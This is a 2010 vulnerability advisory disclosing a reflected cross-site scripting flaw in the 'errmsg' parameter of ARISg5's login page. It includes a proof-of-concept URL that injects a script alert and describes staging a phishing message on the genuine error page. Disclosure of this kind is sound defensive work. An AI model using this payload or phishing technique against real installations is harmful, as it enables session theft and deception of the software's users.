SecurityvulnsSECURITYVULNS:DOC:23308ARISg5 (Version 5.0) Cross Site Scripting Vulnerability
=========================================
Yaniv Miron aka "Lament" Advisory Feb 24, 2010
ARISg5 (Version 5.0) Cross Site Scripting Vulnerability
==========================================================================================
Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron aka "Lament"
Exploit:
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=Phishing Error
Message<script>alert('Malicious XSS Code')</script>
Yaniv Miron aka "Lament".
[email protected]
=====================
I. BACKGROUND
ARISgβ’ - Adverse Drug Event Reporting
pharmacovigilance and safety
ARISg is the world's leading pharmacovigilance
and clinical safety system for good reason,
with more than 300 life-sciences companies
maintaining their critical safety data in ARISg worldwide.
http://www.arisglobal.com/products/arisg.php
=====================
II. DESCRIPTION
-
A malicious attacker may inject scripts into the "errmsg" parameter in the
ARISg5 (Version 5.0) application. -
A malicious attacker may Inject his own error message using the "errmsg"
parameter
and create a phishing attack using the ARISg5 (Version 5.0) application
=====================
III. ANALYSIS
-
Exploitation of this vulnerability results in the execution of arbitrary
code using a malicious link. -
Exploitation of this vulnerability results in creation of a phishing page
using
the original ARISg5 (Version 5.0) application error page.
=====================
IV. EXPLOIT
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=Phishing Error
Message<script>alert('Malicious XSS Code')</script>
=====================
V. DISCLOSURE TIMELINE
Jan 2009 Vulnerability found
Jan 2009 Vendor Notification
Feb 2010 Vendor Notification (Before Disclosure)
Feb 2010 Public Disclosure
=====================
VI. CRETID
Yaniv Miron aka "Lament".
[email protected]